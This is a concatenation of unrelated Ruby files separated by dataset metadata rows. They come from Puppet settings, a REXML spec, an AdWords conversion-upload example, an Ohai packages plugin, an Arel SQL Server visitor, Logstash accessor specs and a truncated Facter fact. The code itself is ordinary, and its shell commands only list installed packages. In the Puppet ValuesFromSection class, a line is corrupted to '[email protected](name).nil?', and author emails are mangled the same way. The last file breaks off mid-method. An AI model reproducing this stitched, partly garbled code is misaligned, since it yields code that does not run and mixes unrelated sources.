def record_deprecations_from_puppet_conf(puppet_conf)
puppet_conf.sections.values.each do |section|
section.settings.each do |conf_setting|
setting = self.setting(conf_setting.name)
if setting
@deprecated_settings_that_have_been_configured << setting if setting.deprecated?
end
end
end
end
def issue_deprecations
@deprecated_settings_that_have_been_configured.each do |setting|
issue_deprecation_warning(setting)
end
end
def issue_deprecation_warning(setting, msg = nil)
name = setting.name
ref = DEPRECATION_REFS.find { |params,reference| params.include?(name) }
ref = ref[1] if ref
case
when msg
msg << " #{ref}" if ref
Puppet.deprecation_warning(msg)
when setting.completely_deprecated?
message = _("Setting %{name} is deprecated.") % { name: name }
message += " #{ref}"
Puppet.deprecation_warning(message, "setting-#{name}")
when setting.allowed_on_commandline?
#TRANSLATORS 'puppet.conf' is a file name and should not be translated
message = _("Setting %{name} is deprecated in puppet.conf.") % { name: name }
message += " #{ref}"
Puppet.deprecation_warning(message, "puppet-conf-setting-#{name}")
end
end
def add_environment_resources(catalog, sections)
path = self[:environmentpath]
envdir = path.split(File::PATH_SEPARATOR).first if path
configured_environment = self[:environment]
if configured_environment == "production" && envdir && Puppet::FileSystem.exist?(envdir)
configured_environment_path = File.join(envdir, configured_environment)
# If configured_environment_path is a symlink, assume the source path is being managed
# elsewhere, so don't do any of this configuration
if !Puppet::FileSystem.symlink?(configured_environment_path)
parameters = { :ensure => 'directory' }
unless Puppet::FileSystem.exist?(configured_environment_path)
parameters[:mode] = '0750'
if Puppet.features.root?
parameters[:owner] = Puppet[:user] if service_user_available?
parameters[:group] = Puppet[:group] if service_group_available?
end
end
catalog.add_resource(Puppet::Resource.new(:file, configured_environment_path, :parameters => parameters))
end
end
end
def add_user_resources(catalog, sections)
return unless Puppet.features.root?
return if Puppet::Util::Platform.windows?
return unless self[:mkusers]
@config.each do |name, setting|
next unless setting.respond_to?(:owner)
next unless sections.nil? or sections.include?(setting.section)
user = setting.owner
if user && user != "root" && catalog.resource(:user, user).nil?
resource = Puppet::Resource.new(:user, user, :parameters => {:ensure => :present})
resource[:gid] = self[:group] if self[:group]
catalog.add_resource resource
end
group = setting.group
if group && ! %w{root wheel}.include?(group) && catalog.resource(:group, group).nil?
catalog.add_resource Puppet::Resource.new(:group, group, :parameters => {:ensure => :present})
end
end
end
# Yield each search source in turn.
def value_sets_for(environment, mode)
searchpath(environment, mode).collect { |source| searchpath_values(source) }.compact
end
# Read the file in.
# @api private
def read_file(file)
return Puppet::FileSystem.read(file, :encoding => 'utf-8')
end
# Private method for internal test use only; allows to do a comprehensive clear of all settings between tests.
#
# @return nil
def clear_everything_for_tests()
unsafe_clear(true, true)
@configuration_file = nil
@global_defaults_initialized = false
@app_defaults_initialized = false
end
private :clear_everything_for_tests
def explicit_config_file?
# Figure out if the user has provided an explicit configuration file. If
# so, return the path to the file, if not return nil.
#
# The easiest way to determine whether an explicit one has been specified
# is to simply attempt to evaluate the value of ":config". This will
# obviously be successful if they've passed an explicit value for :config,
# but it will also result in successful interpolation if they've only
# passed an explicit value for :confdir.
#
# If they've specified neither, then the interpolation will fail and we'll
# get an exception.
#
begin
return true if self[:config]
rescue InterpolationError
# This means we failed to interpolate, which means that they didn't
# explicitly specify either :config or :confdir... so we'll fall out to
# the default value.
return false
end
end
private :explicit_config_file?
# Lookup configuration setting value through a chain of different value sources.
#
# @api public
class ChainedValues
ENVIRONMENT_SETTING = "environment".freeze
ENVIRONMENT_INTERPOLATION_ALLOWED = ['config_version'].freeze
# @see Puppet::Settings.values
# @api private
def initialize(mode, environment, value_sets, defaults)
@mode = mode
@environment = environment
@value_sets = value_sets
@defaults = defaults
end
# Lookup the uninterpolated value.
#
# @param name [Symbol] The configuration setting name to look up
# @return [Object] The configuration setting value or nil if the setting is not known
# @api public
def lookup(name)
set = @value_sets.find do |value_set|
value_set.include?(name)
end
if set
value = set.lookup(name)
if !value.nil?
return value
end
end
@defaults[name].default
end
# Lookup the interpolated value. All instances of `$name` in the value will
# be replaced by performing a lookup of `name` and substituting the text
# for `$name` in the original value. This interpolation is only performed
# if the looked up value is a String.
#
# @param name [Symbol] The configuration setting name to look up
# @return [Object] The configuration setting value or nil if the setting is not known
# @api public
def interpolate(name)
setting = @defaults[name]
return nil unless setting
lookup_and_convert(name) do |val|
setting.munge(val)
end
end
def print(name)
setting = @defaults[name]
return nil unless setting
lookup_and_convert(name) do |val|
setting.print(val)
end
end
private
def lookup_and_convert(name, &block)
val = lookup(name)
# if we interpolate code, all hell breaks loose.
if name == :code
val
else
# Convert it if necessary
begin
val = convert(val, name)
rescue InterpolationError => err
# This happens because we don't have access to the param name when the
# exception is originally raised, but we want it in the message
raise InterpolationError, _("Error converting value for param '%{name}': %{detail}") % { name: name, detail: err }, err.backtrace
end
yield val
end
end
def convert(value, setting_name)
case value
when nil
nil
when String
failed_environment_interpolation = false
interpolated_value = value.gsub(/\$(\w+)|\$\{(\w+)\}/) do |expression|
varname = $2 || $1
interpolated_expression =
if varname != ENVIRONMENT_SETTING || ok_to_interpolate_environment(setting_name)
if varname == ENVIRONMENT_SETTING && @environment
@environment
elsif varname == "run_mode"
@mode
elsif !(pval = interpolate(varname.to_sym)).nil?
pval
else
raise InterpolationError, _("Could not find value for %{expression}") % { expression: expression }
end
else
failed_environment_interpolation = true
expression
end
interpolated_expression
end
if failed_environment_interpolation
#TRANSLATORS '$environment' is a Puppet specific variable and should not be translated
Puppet.warning(_("You cannot interpolate $environment within '%{setting_name}' when using directory environments.") % { setting_name: setting_name } +
' ' + _("Its value will remain %{value}.") % { value: interpolated_value })
end
interpolated_value
else
value
end
end
def ok_to_interpolate_environment(setting_name)
ENVIRONMENT_INTERPOLATION_ALLOWED.include?(setting_name.to_s)
end
end
class Values
extend Forwardable
attr_reader :name
def initialize(name, defaults)
@name = name
@values = {}
@defaults = defaults
end
def_delegator :@values, :include?
def_delegator :@values, :[], :lookup
def set(name, value)
default = @defaults[name]
if !default
raise ArgumentError, _("Attempt to assign a value to unknown setting %{name}") % { name: name.inspect }
end
# This little exception-handling dance ensures that a hook is
# able to check whether a value for itself has been explicitly
# set, while still preserving the existing value if the hook
# throws (as was existing behavior)
old_value = @values[name]
@values[name] = value
begin
if default.has_hook?
default.handle(value)
end
rescue Exception => e
@values[name] = old_value
raise e
end
end
def inspect
%Q{<#{self.class}:#{self.object_id} @name="#{@name}" @values="#{@values}">}
end
end
class ValuesFromSection
attr_reader :name
def initialize(name, section)
@name = name
@section = section
end
def include?(name)
[email protected](name).nil?
end
def lookup(name)
setting = @section.setting(name)
if setting
setting.value
end
end
def inspect
%Q{<#{self.class}:#{self.object_id} @name="#{@name}" @section="#{@section}">}
end
end
# @api private
class ValuesFromEnvironmentConf
def initialize(environment_name)
@environment_name = environment_name
end
def name
@environment_name
end
def include?(name)
if Puppet::Settings::EnvironmentConf::VALID_SETTINGS.include?(name) && conf
return true
end
false
end
def lookup(name)
return nil unless Puppet::Settings::EnvironmentConf::VALID_SETTINGS.include?(name)
conf.send(name) if conf
end
def conf
unless @conf
environments = Puppet.lookup(:environments) { nil }
@conf = environments.get_conf(@environment_name) if environments
end
@conf
end
def inspect
%Q{<#{self.class}:#{self.object_id} @environment_name="#{@environment_name}" @conf="#{@conf}">}
end
end
end
| 33.434923 | 161 | 0.681024 |
e963137d05cbe59b3911e6aa86e90e5037f275fe | 212 | require File.dirname(__FILE__) + '/../../../spec_helper'
require File.dirname(__FILE__) + '/shared/to_s'
require 'rexml/document'
describe "REXML::CData#value" do
it_behaves_like :rexml_cdata_to_s, :value
end
| 26.5 | 56 | 0.740566 |
f8ef11b0957eda78fd8992a65da1dbbb3b0bce7f | 4,256 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright:: Copyright 2013, Google Inc. All Rights Reserved.
#
# License:: Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This code example imports offline conversion values for specific clicks to
# your account. To get Google Click ID for a click, run
# CLICK_PERFORMANCE_REPORT. To set up a conversion tracker, run the
# add_conversion_trackers.rb example.
require 'adwords_api'
require 'date'
def upload_offline_conversions(conversion_name, google_click_id,
conversion_time, conversion_value)
# AdwordsApi::Api will read a config file from ENV['HOME']/adwords_api.yml
# when called without parameters.
adwords = AdwordsApi::Api.new
# To enable logging of SOAP requests, set the log_level value to 'DEBUG' in
# the configuration file or provide your own logger:
# adwords.logger = Logger.new('adwords_xml.log')
conversion_feed_srv =
adwords.service(:OfflineConversionFeedService, API_VERSION)
# Associate offline conversions with the existing named conversion tracker. If
# this tracker was newly created, it may be a few hours before it can accept
# conversions.
feed = {
:conversion_name => conversion_name,
:google_click_id => google_click_id,
:conversion_time => conversion_time,
:conversion_value => conversion_value
}
# Optional: To upload fractional conversion credits, set the external
# attribution model and credit. To use this feature, your conversion tracker
# should be marked as externally attributed. See
# https://developers.google.com/adwords/api/docs/guides/conversion-tracking#importing_externally_attributed_conversions
# to learn more about importing externally attributed conversions.
#
# feed[:external_attribution_model] = "Linear"
# feed[:external_attribution_credit] = 0.3
return_feeds = conversion_feed_srv.mutate([
{:operator => 'ADD', :operand => feed}])
return_feeds[:value].each do |return_feed|
puts ("Uploaded offline conversion value %.2f for Google Click ID '%s', " +
'to %s') % [return_feed[:conversion_value],
return_feed[:google_click_id],
return_feed[:conversion_name]]
end
end
if __FILE__ == $0
API_VERSION = :v201710
begin
# Name of the conversion tracker to upload to.
conversion_name = 'INSERT_CONVERSION_NAME_HERE'
# Google Click ID of the click for which offline conversions are uploaded.
google_click_id = 'INSERT_GOOGLE_CLICK_ID_HERE'
# Conversion time in 'yyyymmdd hhmmss' format.
conversion_time = Time.new.strftime("%Y%m%d %H%M%S")
# Conversion value to be uploaded.
conversion_value = 'INSERT_CONVERSION_VALUE_HERE'.to_f
upload_offline_conversions(conversion_name, google_click_id,
conversion_time, conversion_value)
# Authorization error.
rescue AdsCommon::Errors::OAuth2VerificationRequired => e
puts "Authorization credentials are not valid. Edit adwords_api.yml for " +
"OAuth2 client ID and secret and run misc/setup_oauth2.rb example " +
"to retrieve and store OAuth2 tokens."
puts "See this wiki page for more details:\n\n " +
'https://github.com/googleads/google-api-ads-ruby/wiki/OAuth2'
# HTTP errors.
rescue AdsCommon::Errors::HttpError => e
puts "HTTP Error: %s" % e
# API errors.
rescue AdwordsApi::Errors::ApiException => e
puts "Message: %s" % e.message
puts 'Errors:'
e.errors.each_with_index do |error, index|
puts "\tError [%d]:" % (index + 1)
error.each do |field, value|
puts "\t\t%s: %s" % [field, value]
end
end
end
end
| 39.045872 | 121 | 0.700188 |
01cf210e3d09f460fa5cb842069af28daadb1734 | 4,971 | # Author:: "Christian Höltje" <[email protected]>
# Author:: "Christopher M. Luciano" <[email protected]>
# Author:: Shahul Khajamohideen (<[email protected]>)
# Copyright (C) 2015 IBM Corp.
# Copyright (C) 2015 Bloomberg Finance L.P.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
Ohai.plugin(:Packages) do
provides "packages"
depends "platform_family"
WINDOWS_ATTRIBUTE_ALIASES = {
"DisplayVersion" => "version",
"Publisher" => "publisher",
"InstallDate" => "installdate",
} unless defined?(WINDOWS_ATTRIBUTE_ALIASES)
collect_data(:linux) do
packages Mash.new
if %w{debian}.include? platform_family
format = '${Package}\t${Version}\t${Architecture}\n'
so = shell_out("dpkg-query -W -f='#{format}'")
pkgs = so.stdout.lines
pkgs.each do |pkg|
name, version, arch = pkg.split
packages[name] = { "version" => version, "arch" => arch }
end
elsif %w{rhel fedora suse pld}.include? platform_family
format = '%{NAME}\t%|EPOCH?{%{EPOCH}}:{0}|\t%{VERSION}\t%{RELEASE}\t%{INSTALLTIME}\t%{ARCH}\n'
so = shell_out("rpm -qa --qf '#{format}'")
pkgs = so.stdout.lines
pkgs.each do |pkg|
name, epoch, version, release, installdate, arch = pkg.split
packages[name] = { "epoch" => epoch, "version" => version, "release" => release, "installdate" => installdate, "arch" => arch }
end
end
end
def collect_programs_from_registry_key(key_path)
# from http://msdn.microsoft.com/en-us/library/windows/desktop/aa384129(v=vs.85).aspx
if ::RbConfig::CONFIG["target_cpu"] == "i386"
reg_type = Win32::Registry::KEY_READ | 0x100
elsif ::RbConfig::CONFIG["target_cpu"] == "x86_64"
reg_type = Win32::Registry::KEY_READ | 0x200
else
reg_type = Win32::Registry::KEY_READ
end
Win32::Registry::HKEY_LOCAL_MACHINE.open(key_path, reg_type) do |reg|
reg.each_key do |key, _wtime|
pkg = reg.open(key)
name = pkg["DisplayName"] rescue nil
next if name.nil?
package = packages[name] = Mash.new
WINDOWS_ATTRIBUTE_ALIASES.each do |registry_attr, package_attr|
value = pkg[registry_attr] rescue nil
package[package_attr] = value unless value.nil?
end
end
end
end
collect_data(:windows) do
require "win32/registry"
packages Mash.new
collect_programs_from_registry_key('Software\Microsoft\Windows\CurrentVersion\Uninstall')
# on 64 bit systems, 32 bit programs are stored here
collect_programs_from_registry_key('Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall')
end
collect_data(:aix) do
packages Mash.new
so = shell_out("lslpp -L -q -c")
pkgs = so.stdout.lines
# Output format is
# Package Name:Fileset:Level
# On aix, filesets are packages and levels are versions
pkgs.each do |pkg|
_, name, version = pkg.split(":")
packages[name] = { "version" => version }
end
end
collect_data(:freebsd) do
packages Mash.new
so = shell_out('pkg query -a "%n %v"')
# Output format is
# name version
so.stdout.lines do |pkg|
name, version = pkg.split(" ")
packages[name] = { "version" => version }
end
end
def collect_ips_packages
so = shell_out("pkg list -H")
# Output format is
# NAME (PUBLISHER) VERSION IFO
so.stdout.lines.each do |pkg|
tokens = pkg.split
if tokens.length == 3 # No publisher info
name, version, = tokens
else
name, publisher, version, = tokens
publisher = publisher[1..-2]
end
packages[name] = { "version" => version }
packages[name]["publisher"] = publisher if publisher
end
end
def collect_sysv_packages
so = shell_out("pkginfo -l")
# Each package info is separated by a blank line
chunked_lines = so.stdout.lines.map(&:strip).chunk do |line|
!line.empty? || nil
end
chunked_lines.each do |_, lines|
package = {}
lines.each do |line|
key, value = line.split(":", 2)
package[key.strip.downcase] = value.strip unless value.nil?
end
# pkginst is the installed package name
packages[package["pkginst"]] = package.tap do |p|
p.delete("pkginst")
end
end
end
collect_data(:solaris2) do
packages Mash.new
collect_ips_packages
collect_sysv_packages
end
end
| 32.490196 | 135 | 0.652384 |
ed750b1bbef744518800b8ebdd662461c8cb21b6 | 11,848 | require 'arel'
require 'arel/select_manager_sqlserver'
module Arel
module Nodes
# Extending the Ordering class to be comparison friendly which allows us to call #uniq on a
# collection of them. See SelectManager#order for more details.
class Ordering < Arel::Nodes::Unary
def hash
expr.hash
end
def ==(other)
other.is_a?(Arel::Nodes::Ordering) && self.expr == other.expr
end
def eql?(other)
self == other
end
end
end
module Visitors
class SQLServer < Arel::Visitors::ToSql
private
# SQLServer ToSql/Visitor (Overides)
def visit_Arel_Nodes_SelectStatement(o, a)
if complex_count_sql?(o)
visit_Arel_Nodes_SelectStatementForComplexCount(o, a)
elsif o.offset
visit_Arel_Nodes_SelectStatementWithOffset(o, a)
else
visit_Arel_Nodes_SelectStatementWithOutOffset(o, a)
end
end
def visit_Arel_Nodes_UpdateStatement(o, a)
if o.orders.any? && o.limit.nil?
o.limit = Nodes::Limit.new(9223372036854775807)
end
super
end
def visit_Arel_Nodes_Offset(o, a)
"WHERE [__rnt].[__rn] > (#{visit o.expr})"
end
def visit_Arel_Nodes_Limit(o, a)
"TOP (#{visit o.expr})"
end
def visit_Arel_Nodes_Lock(o, a)
visit o.expr
end
def visit_Arel_Nodes_Ordering(o, a)
if o.respond_to?(:direction)
"#{visit o.expr} #{o.ascending? ? 'ASC' : 'DESC'}"
else
visit o.expr
end
end
def visit_Arel_Nodes_Bin(o, a)
"#{visit o.expr} #{@connection.cs_equality_operator}"
end
# SQLServer ToSql/Visitor (Additions)
def visit_Arel_Nodes_SelectStatementWithOutOffset(o, a, windowed = false)
find_and_fix_uncorrelated_joins_in_select_statement(o)
core = o.cores.first
projections = core.projections
groups = core.groups
orders = o.orders.uniq
if windowed
projections = function_select_statement?(o) ? projections : projections.map { |x| projection_without_expression(x) }
groups = projections.map { |x| projection_without_expression(x) } if windowed_single_distinct_select_statement?(o) && groups.empty?
groups += orders.map { |x| Arel.sql(x.expr) } if windowed_single_distinct_select_statement?(o)
elsif eager_limiting_select_statement?(o)
projections = projections.map { |x| projection_without_expression(x) }
groups = projections.map { |x| projection_without_expression(x) }
orders = orders.map do |x|
expr = Arel.sql projection_without_expression(x.expr)
x.descending? ? Arel::Nodes::Max.new([expr]) : Arel::Nodes::Min.new([expr])
end
elsif top_one_everything_for_through_join?(o)
projections = projections.map { |x| projection_without_expression(x) }
end
[ ("SELECT" if !windowed),
(visit(core.set_quantifier) if core.set_quantifier && !windowed),
(visit(o.limit) if o.limit && !windowed),
(projections.map{ |x| v = visit(x); v == "1" ? "1 AS [__wrp]" : v }.join(', ')),
(source_with_lock_for_select_statement(o)),
("WHERE #{core.wheres.map{ |x| visit(x) }.join ' AND ' }" unless core.wheres.empty?),
("GROUP BY #{groups.map { |x| visit(x) }.join ', ' }" unless groups.empty?),
(visit(core.having) if core.having),
("ORDER BY #{orders.map{ |x| visit(x) }.join(', ')}" if !orders.empty? && !windowed)
].compact.join ' '
end
def visit_Arel_Nodes_SelectStatementWithOffset(o, a)
core = o.cores.first
o.limit ||= Arel::Nodes::Limit.new(9223372036854775807)
orders = rowtable_orders(o)
[ "SELECT",
(visit(o.limit) if o.limit && !windowed_single_distinct_select_statement?(o)),
(rowtable_projections(o).map{ |x| visit(x) }.join(', ')),
"FROM (",
"SELECT #{core.set_quantifier ? 'DISTINCT DENSE_RANK()' : 'ROW_NUMBER()'} OVER (ORDER BY #{orders.map{ |x| visit(x) }.join(', ')}) AS [__rn],",
visit_Arel_Nodes_SelectStatementWithOutOffset(o, a, true),
") AS [__rnt]",
(visit(o.offset) if o.offset),
"ORDER BY [__rnt].[__rn] ASC"
].compact.join ' '
end
def visit_Arel_Nodes_SelectStatementForComplexCount(o, a)
core = o.cores.first
o.limit.expr = Arel.sql("#{o.limit.expr} + #{o.offset ? o.offset.expr : 0}") if o.limit
orders = rowtable_orders(o)
[ "SELECT COUNT([count]) AS [count_id]",
"FROM (",
"SELECT",
(visit(o.limit) if o.limit),
"ROW_NUMBER() OVER (ORDER BY #{orders.map{ |x| visit(x) }.join(', ')}) AS [__rn],",
"1 AS [count]",
(source_with_lock_for_select_statement(o)),
("WHERE #{core.wheres.map{ |x| visit(x) }.join ' AND ' }" unless core.wheres.empty?),
("GROUP BY #{core.groups.map { |x| visit x }.join ', ' }" unless core.groups.empty?),
(visit(core.having) if core.having),
("ORDER BY #{o.orders.map{ |x| visit(x) }.join(', ')}" if !o.orders.empty?),
") AS [__rnt]",
(visit(o.offset) if o.offset)
].compact.join ' '
end
# SQLServer Helpers
def source_with_lock_for_select_statement(o)
core = o.cores.first
source = "FROM #{visit(core.source).strip}" if core.source
if source && o.lock
lock = visit o.lock
index = source.match(/FROM [\w\[\]\.]+/)[0].mb_chars.length
source.insert index, " #{lock}"
else
source
end
end
def table_from_select_statement(o)
core = o.cores.first
# TODO: [ARel 2.2] Use #from/#source vs. #froms
# if Arel::Table === core.from
# core.from
# elsif Arel::Nodes::SqlLiteral === core.from
# Arel::Table.new(core.from, @engine)
# elsif Arel::Nodes::JoinSource === core.source
# Arel::Nodes::SqlLiteral === core.source.left ? Arel::Table.new(core.source.left, @engine) : core.source.left
# end
table_finder = lambda { |x|
case x
when Arel::Table
x
when Arel::Nodes::SqlLiteral
Arel::Table.new(x, @engine)
when Arel::Nodes::Join
table_finder.call(x.left)
end
}
table_finder.call(core.froms)
end
def single_distinct_select_statement?(o)
projections = o.cores.first.projections
p1 = projections.first
projections.size == 1 &&
((p1.respond_to?(:distinct) && p1.distinct) ||
p1.respond_to?(:include?) && p1.include?('DISTINCT'))
end
def windowed_single_distinct_select_statement?(o)
o.limit && o.offset && single_distinct_select_statement?(o)
end
def single_distinct_select_everything_statement?(o)
single_distinct_select_statement?(o) && visit(o.cores.first.projections.first).ends_with?(".*")
end
def top_one_everything_for_through_join?(o)
single_distinct_select_everything_statement?(o) &&
(o.limit && !o.offset) &&
join_in_select_statement?(o)
end
def all_projections_aliased_in_select_statement?(o)
projections = o.cores.first.projections
projections.all? do |x|
visit(x).split(',').all? { |y| y.include?(' AS ') }
end
end
def function_select_statement?(o)
core = o.cores.first
core.projections.any? { |x| Arel::Nodes::Function === x }
end
def eager_limiting_select_statement?(o)
core = o.cores.first
single_distinct_select_statement?(o) &&
(o.limit && !o.offset) &&
core.groups.empty? &&
!single_distinct_select_everything_statement?(o)
end
def join_in_select_statement?(o)
core = o.cores.first
core.source.right.any? { |x| Arel::Nodes::Join === x }
end
def complex_count_sql?(o)
core = o.cores.first
core.projections.size == 1 &&
Arel::Nodes::Count === core.projections.first &&
o.limit &&
!join_in_select_statement?(o)
end
def select_primary_key_sql?(o)
core = o.cores.first
return false if core.projections.size != 1
p = core.projections.first
t = table_from_select_statement(o)
Arel::Attributes::Attribute === p && t.primary_key && t.primary_key.name == p.name
end
def find_and_fix_uncorrelated_joins_in_select_statement(o)
core = o.cores.first
# TODO: [ARel 2.2] Use #from/#source vs. #froms
# return if !join_in_select_statement?(o) || core.source.right.size != 2
# j1 = core.source.right.first
# j2 = core.source.right.second
# return unless Arel::Nodes::OuterJoin === j1 && Arel::Nodes::StringJoin === j2
# j1_tn = j1.left.name
# j2_tn = j2.left.match(/JOIN \[(.*)\].*ON/).try(:[],1)
# return unless j1_tn == j2_tn
# crltd_tn = "#{j1_tn}_crltd"
# j1.left.table_alias = crltd_tn
# j1.right.expr.left.relation.table_alias = crltd_tn
return if !join_in_select_statement?(o) || !(Arel::Nodes::StringJoin === core.froms)
j1 = core.froms.left
j2 = core.froms.right
return unless Arel::Nodes::OuterJoin === j1 && Arel::Nodes::SqlLiteral === j2 && j2.include?('JOIN ')
j1_tn = j1.right.name
j2_tn = j2.match(/JOIN \[(.*)\].*ON/).try(:[],1)
return unless j1_tn == j2_tn
on_index = j2.index(' ON ')
j2.insert on_index, " AS [#{j2_tn}_crltd]"
j2.sub! "[#{j2_tn}].", "[#{j2_tn}_crltd]."
end
def rowtable_projections(o)
core = o.cores.first
if windowed_single_distinct_select_statement?(o) && core.groups.blank?
tn = table_from_select_statement(o).name
core.projections.map do |x|
x.dup.tap do |p|
p.sub! 'DISTINCT', ''
p.insert 0, visit(o.limit) if o.limit
p.gsub! /\[?#{tn}\]?\./, '[__rnt].'
p.strip!
end
end
elsif single_distinct_select_statement?(o)
tn = table_from_select_statement(o).name
core.projections.map do |x|
x.dup.tap do |p|
p.sub! 'DISTINCT', "DISTINCT #{visit(o.limit)}".strip if o.limit
p.gsub! /\[?#{tn}\]?\./, '[__rnt].'
p.strip!
end
end
elsif join_in_select_statement?(o) && all_projections_aliased_in_select_statement?(o)
core.projections.map do |x|
Arel.sql visit(x).split(',').map{ |y| y.split(' AS ').last.strip }.join(', ')
end
elsif select_primary_key_sql?(o)
[Arel.sql("[__rnt].#{quote_column_name(core.projections.first.name)}")]
else
[Arel.sql('[__rnt].*')]
end
end
def rowtable_orders(o)
core = o.cores.first
if !o.orders.empty?
o.orders
else
t = table_from_select_statement(o)
c = t.primary_key || t.columns.first
[c.asc]
end.uniq
end
# TODO: We use this for grouping too, maybe make Grouping objects vs SqlLiteral.
def projection_without_expression(projection)
Arel.sql(visit(projection).split(',').map do |x|
x.strip!
x.sub!(/^(COUNT|SUM|MAX|MIN|AVG)\s*(\((.*)\))?/,'\3')
x.sub!(/^DISTINCT\s*/,'')
x.sub!(/TOP\s*\(\d+\)\s*/i,'')
x.strip
end.join(', '))
end
end
end
end
Arel::Visitors::VISITORS['sqlserver'] = Arel::Visitors::SQLServer
| 36.232416 | 155 | 0.575456 |
1dbdcf65a92982d393807ff14b8b9162465732d4 | 94 | # frozen_string_literal: true
module RuboCop
module Expert
VERSION = '0.1.2'
end
end
| 11.75 | 29 | 0.702128 |
e86e25aed37e0bc14ccac48f2545716a11f83e77 | 6,290 | # encoding: utf-8
require "test_utils"
require "logstash/util/accessors"
describe LogStash::Util::Accessors, :if => true do
context "using simple field" do
it "should get value of word key" do
str = "hello"
data = { "hello" => "world" }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.get(str) } == data[str]
end
it "should get value of key with spaces" do
str = "hel lo"
data = { "hel lo" => "world" }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.get(str) } == data[str]
end
it "should get value of numeric key string" do
str = "1"
data = { "1" => "world" }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.get(str) } == data[str]
end
it "should handle delete" do
str = "simple"
data = { "simple" => "things" }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.del(str) } == "things"
insist { data }.empty?
end
it "should set string value" do
str = "simple"
data = {}
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.set(str, "things") } == "things"
insist { data } == { "simple" => "things" }
end
it "should set array value" do
str = "simple"
data = {}
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.set(str, ["foo", "bar"]) } == ["foo", "bar"]
insist { data } == { "simple" => ["foo", "bar"]}
end
end
context "using field path" do
it "should get shallow string value of word key" do
str = "[hello]"
data = { "hello" => "world" }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.get(str) } == "world"
end
it "should get shallow string value of key with spaces" do
str = "[hel lo]"
data = { "hel lo" => "world" }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.get(str) } == "world"
end
it "should get shallow string value of numeric key string" do
str = "[1]"
data = { "1" => "world" }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.get(str) } == "world"
end
it "should get deep string value" do
str = "[hello][world]"
data = { "hello" => { "world" => "foo", "bar" => "baz" } }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.get(str) } == data["hello"]["world"]
end
it "should get deep string value" do
str = "[hello][world]"
data = { "hello" => { "world" => "foo", "bar" => "baz" } }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.get(str) } == data["hello"]["world"]
end
it "should handle delete" do
str = "[hello][world]"
data = { "hello" => { "world" => "foo", "bar" => "baz" } }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.del(str) } == "foo"
# Make sure the "world" key is removed.
insist { data["hello"] } == { "bar" => "baz" }
end
it "should set shallow string value" do
str = "[hello]"
data = {}
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.set(str, "foo") } == "foo"
insist { data } == { "hello" => "foo" }
end
it "should strict_set shallow string value" do
str = "[hello]"
data = {}
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.strict_set(str, "foo") } == "foo"
insist { data } == { "hello" => "foo" }
end
it "should set deep string value" do
str = "[hello][world]"
data = {}
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.set(str, "foo") } == "foo"
insist { data } == { "hello" => { "world" => "foo" } }
end
it "should set deep array value" do
str = "[hello][world]"
data = {}
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.set(str, ["foo", "bar"]) } == ["foo", "bar"]
insist { data } == { "hello" => { "world" => ["foo", "bar"] } }
end
it "should strict_set deep array value" do
str = "[hello][world]"
data = {}
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.strict_set(str, ["foo", "bar"]) } == ["foo", "bar"]
insist { data } == { "hello" => { "world" => ["foo", "bar"] } }
end
it "should retrieve array item" do
data = { "hello" => { "world" => ["a", "b"], "bar" => "baz" } }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.get("[hello][world][0]") } == data["hello"]["world"][0]
insist { accessors.get("[hello][world][1]") } == data["hello"]["world"][1]
end
it "should retrieve array item containing hash" do
data = { "hello" => { "world" => [ { "a" => 123 }, { "b" => 345 } ], "bar" => "baz" } }
accessors = LogStash::Util::Accessors.new(data)
insist { accessors.get("[hello][world][0][a]") } == data["hello"]["world"][0]["a"]
insist { accessors.get("[hello][world][1][b]") } == data["hello"]["world"][1]["b"]
end
end
context "using invalid encoding" do
it "strinct_set should raise on non UTF-8 string encoding" do
str = "[hello]"
data = {}
accessors = LogStash::Util::Accessors.new(data)
expect { accessors.strict_set(str, "foo".encode("US-ASCII")) }.to raise_error
end
it "strinct_set should raise on non UTF-8 string encoding in array" do
str = "[hello]"
data = {}
accessors = LogStash::Util::Accessors.new(data)
expect { accessors.strict_set(str, ["foo", "bar".encode("US-ASCII")]) }.to raise_error
end
it "strinct_set should raise on invalid UTF-8 string encoding" do
str = "[hello]"
data = {}
accessors = LogStash::Util::Accessors.new(data)
expect { accessors.strict_set(str, "foo \xED\xB9\x81\xC3") }.to raise_error
end
it "strinct_set should raise on invalid UTF-8 string encoding in array" do
str = "[hello]"
data = {}
accessors = LogStash::Util::Accessors.new(data)
expect { accessors.strict_set(str, ["foo", "bar \xED\xB9\x81\xC3"]) }.to raise_error
end
end
end
| 33.457447 | 93 | 0.558665 |
ab8e675b36365fe65068b00384d69e624d5119fd | 867 | # frozen_string_literal: true
module Facts
module Aix
class Disks
FACT_NAME = 'disks'
ALIASES = %w[blockdevices blockdevice_.*_size].freeze
def call_the_resolver
